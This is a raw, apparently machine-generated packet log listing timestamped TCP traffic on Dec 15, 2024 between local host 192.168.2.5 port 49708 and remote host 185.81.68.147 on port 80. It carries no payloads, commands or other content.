                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.753737926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.754827976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.754890919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.754961967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.755970955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.756022930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.756094933 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.757072926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.757404089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.757476091 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.758271933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.758330107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.758397102 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.759383917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.759591103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.759660959 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.760683060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.760699987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.760772943 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.761720896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.761816978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.761884928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.762867928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.763103008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.763176918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.764080048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.764185905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.764261007 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.765269041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.765325069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.765403986 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.766412020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.766474962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.766536951 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.767560959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.767678022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.767751932 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.768680096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.768785954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.768847942 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.769974947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.769988060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.770070076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.771187067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.771198988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.771275043 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.772250891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.772268057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.772336006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.773308992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.773449898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.773521900 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.774499893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.774604082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.774672985 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.775664091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.775844097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.775918007 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.776998043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.777009964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.777096987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.778059959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.778072119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.778146982 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.779161930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.779304981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.779345989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.780281067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.780433893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.780467987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.781471014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.781569004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.781608105 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.782655954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.782860994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.782943010 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.783957005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.784173012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.784243107 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.784959078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.785048008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.785125017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.786217928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.786227942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.786351919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.787306070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.787374973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.787441969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.788445950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.788552046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.788625002 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.789572954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.833136082 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.920838118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.920989990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.921077013 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.921509027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.921849966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.921936035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.922473907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.922600985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.922669888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.923666954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.923700094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.923770905 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.924767971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.924963951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.925043106 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.926029921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.926042080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.926121950 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.927138090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.927299976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.927367926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.928328991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.928569078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.928642035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.929546118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.929696083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.929759979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.930728912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.930773973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.930835009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.931808949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.931907892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.931989908 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.933054924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.933223963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.933300018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.934120893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.934326887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.934401989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.935260057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.935328960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.935399055 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.936423063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.936624050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.936697006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.937599897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.937778950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.937854052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.938702106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.938914061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.938977957 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.939940929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.940318108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.940387011 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.941076040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.941145897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.941214085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.942209005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.942495108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.942565918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.943358898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.943516016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.943591118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.944502115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.944684982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.944751978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.945677996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.945796967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.945869923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.946867943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.946959972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.947033882 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.948077917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.948120117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.948189974 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.949150085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.949253082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.949310064 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.950352907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.950627089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.950695992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.951598883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.951611996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.951695919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.952763081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.952773094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.952847004 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.953802109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.953905106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.953974009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.954956055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.955095053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.955177069 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.956156015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.956269026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.956340075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.957331896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.957715034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.957784891 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.958550930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.958564043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.958647966 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.959635973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.959778070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.959849119 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.960815907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.960932016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.961008072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.961992025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.962156057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.962224960 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.963104010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.963253021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.963325024 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.964282036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.964576960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.964651108 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.965533018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.965544939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.965626955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.966583014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.966744900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.966820002 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.967726946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.967833996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.967905998 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.968939066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.969167948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.969229937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.970129013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.970197916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.970264912 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.971209049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.971340895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.971417904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.972474098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.972695112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.972764015 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.973565102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.973690033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.973788977 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.974679947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.974807978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.974870920 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.975866079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.975999117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.976068974 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.976994038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.977144003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.977212906 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.978318930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.978328943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.978410006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.979382038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.979620934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.979681969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.980552912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.980638981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.980705976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.981673956 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.036304951 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.112943888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.112957001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.113059998 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.113430977 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.113440990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.113528967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.113552094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.114689112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.114703894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.114729881 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.115807056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.115864992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.115875006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.117100954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.117115021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.117155075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.118206024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.118217945 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.118261099 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.119359016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.119370937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.119410992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.120569944 CET8049708185.81.68.147192.168.2.5
